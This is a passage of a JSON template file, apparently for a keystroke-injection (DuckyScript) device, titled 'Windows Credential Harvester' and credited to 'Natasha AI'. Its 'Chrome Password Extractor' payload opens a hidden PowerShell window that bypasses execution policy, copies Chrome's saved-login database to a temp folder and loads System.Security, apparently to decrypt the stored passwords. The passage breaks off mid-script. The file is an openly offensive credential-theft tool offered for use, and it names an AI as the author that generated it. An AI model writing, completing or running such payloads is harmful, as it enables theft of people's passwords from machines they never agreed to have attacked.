{
  "metadata": {
    "name": "Windows Credential Harvester",
    "description": "Extracts stored credentials from Windows systems",
    "version": "1.0",
    "author": "Natasha AI"
  },
  "templates": [
    {
      "name": "Chrome Password Extractor",
      "description": "Extracts saved passwords from Chrome browser",
      "attack_type": "credential_harvest",
      "script": [
        "REM Chrome Password Extractor for Windows",
        "REM Generated by Natasha AI",
        "DELAY 1000",
        "GUI r",
        "DELAY 500",
        "STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass",
        "ENTER",
        "DELAY 1000",
        "STRING $outputFile = &quot;$env:TEMP\\chrome_passwords.txt&quot;",
        "ENTER",
        "STRING $loginDataPath = &quot;$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data&quot;",
        "ENTER",
        "STRING if (Test-Path $loginDataPath) {",
        "ENTER",
        "STRING   Copy-Item -Path $loginDataPath -Destination &quot;$env:TEMP\\Login Data&quot; -Force",
        "ENTER",
        "STRING   Add-Type -AssemblyName System.Security",
